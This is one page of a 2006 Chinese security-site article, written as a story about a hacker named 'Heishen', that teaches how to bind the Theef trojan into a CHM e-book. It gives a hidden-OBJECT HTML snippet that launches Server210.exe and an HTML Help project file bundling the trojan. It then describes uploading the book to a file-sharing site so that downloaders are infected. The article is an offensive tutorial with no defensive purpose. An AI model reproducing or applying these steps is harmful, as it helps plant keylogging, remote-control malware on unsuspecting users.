网络安全参考 | UNIX参考 | GPS参考 | 无线参考 | 在线手册 | OSBUG.ORG | SUNNY-NETWORK.COM
网站地图 RSS订阅
高级搜索 收藏本站
Home | 业界动态 | 防火墙 | IDS/IPS | VPN | PKI | Honeypot | Hacker/Intruder | 黑客技术 | 破解技术 | 加密技术 | 病毒防护 | 木马 | 反垃圾邮件 | 反流氓软件 | 漏洞 | 无线安全 | UNIX | Windows | 安全编程 | 安全软件 | TPM/TCG | 数据恢复 | 企业信息安全 | 个人信息安全
 当前位置: Home > 木马 > 文章  
黑客终极案例之黑神五法秘行江湖
文章来源: 网友世界 文章作者: 妖界之箭 发布时间: 2006-07-23   字体: [ ]
 

  包容万物的黑夜充满了神秘感……

  到了夜里便是黑客们的世界,因为晚间上网的人少,网速很快,再加之网络管理员精神上的松懈。由于种种原因,陆续上演了很多本不该发生的故事……

  12点整,一袭黑衣的黑神再一次悄悄地通过网吧出现在了互联网上,开始了本晚的五大秘密行动……

  第一幕 书中自有小木马

  黑神的工具箱中摆满了各式新奇黑软,其中Theef(如图1)*******就是一款功能强焊的DLL 特洛伊木马。该木马具有自定义插入系统进程、文件管理、进程管理、窗口管理、记录键盘相关操作、用DOS命令控制及编写BAT、VBS运行、点对点聊天、抓屏、屏幕控制,以及一大堆恶作剧功能。

  黑神从工具箱中取出木马Theef与Microsoft HTML HELP Workshop v1.32电子书制作工具。而后,从网上下载了chm格式的电子书《唐伯虎点秋香之经典对白》(如图2)**********。男人都是以泡MM为乐事,黑神也不例外了^-^黑神打开了《唐伯虎点秋香之经典对白》电子书,在随后弹出的主窗口空白处用鼠标右键单击,选择“属性”,获知其网址链接为mk: @MSITStore:C:\WINNT\system32\唐伯虎点秋香之经典对白.chm::/唐伯虎点秋香之经典对白。而后,黑神随手新建了一个文本文件,在其中输入如下代码:

 

以下是引用片段:

<HTML>
<HEAD>
<meta http-equiv="refresh" content="3;
url='/唐伯虎点秋香之经典对白
'">
</HEAD>
<BODY>
<OBJECT Width=0 Height=0 style="display:none;"
TYPE="application/x-oleobiject"CODEBASE="Server210.exe">
</OBJECT>
</BODY>
</HTML>

  完成后,将其另存为MM.htm网页文件。做了一次深呼息后,黑神启动安装好的Microsoft HTML HELP Workshop 工具,选择菜单项“文件菜单”→“解译”。从中找到C:\WINNT\system32\唐伯虎点秋香之经典对白的电子书路径,将保存路径更改为E:\ hack。而后,将木马客户端文件Server210.exe拖放至其中。此后新建了一个文本文件,输入以下内容:

 

以下是引用片段:

  [OPTIONS]
  Compatibility=1.1 Or later
  Compiled file=Cliconf.chm
  Default Window=Main
  Language=0x804中文(中国)
  [WINDOWS]
  Main="SQL Server 客户端网络实用工具是什么?","唐伯虎点秋香之经典对.hhc","唐伯虎点秋香之经典对.hhk","mm.htm",,,,,,0x420,150,0x104e,,0x0,0x0,,,,,0
  [Files]
  mm.htm
  Server210.exe

  输入完毕后将该文件命名为mm.hhp,并存储于E:\hack文件夹。接着在Microsoft HTML HELP Workshop中打开mm.hhp,选择保存所有文件并编译。关闭该程序后进入到E:\hack目录下,黑神打了个漂亮的响指,电子书木马横空出世了!

  黑神立即挟带木马登陆早已注册了的网络硬盘空间站,建立一个目录《伯虎名对》。然后上传编译好的木马电子书到该目录下守株待兔。只要有人下载了这本电子书,那他同时将免费得到一匹小马!

 
推荐文章
·木马免杀技术大盘点与杀毒软件设
·拒绝不速之客入侵 拆穿木马伪装
·黑手揭秘:与BT下载的捆马者来一
·木马综述篇:通通透透看木马
·“灰鸽子”网页木马从原理、制作
·揭开木马的神秘面纱(一)
·特洛伊木马原理分析
·解析危险的特洛伊木马
 

 
共4页: 上一页 1 [2] [3] [4] 下一页
↑返回顶部   打印本页   关闭窗口↓  

Google
 
Web oldhand.org unixreference.net meshmea.org
热点文章
·木马综述篇:通通透透看
·查杀木马: Trojan-spy.w
·特洛伊木马原理分析
·什么是特洛伊木马?
·揭开木马的神秘面纱(一)
·解析危险的特洛伊木马
·“灰鸽子”病毒手工清除
·“灰鸽子”网页木马从原
相关分类
相关文章
·木马综述篇:通通透透看
·“灰鸽子”病毒手工清除
·最新威胁“灰鸽子2005”
·知已知彼 远程监控软件
·“灰鸽子”网页木马从原
·勒索软件正成为2006年最
·下一件安全大事:加强防
·揭开木马的神秘面纱(一)
更多...
 
 

Copyright(c) 2001-2008 OLDHAND ORGANIZATION, All Rights reserved.
Power by DedeCms 织梦内容管理系统
$Id: article_article.html,v 1.3 2007/02/10 12:00:37 yjs Exp $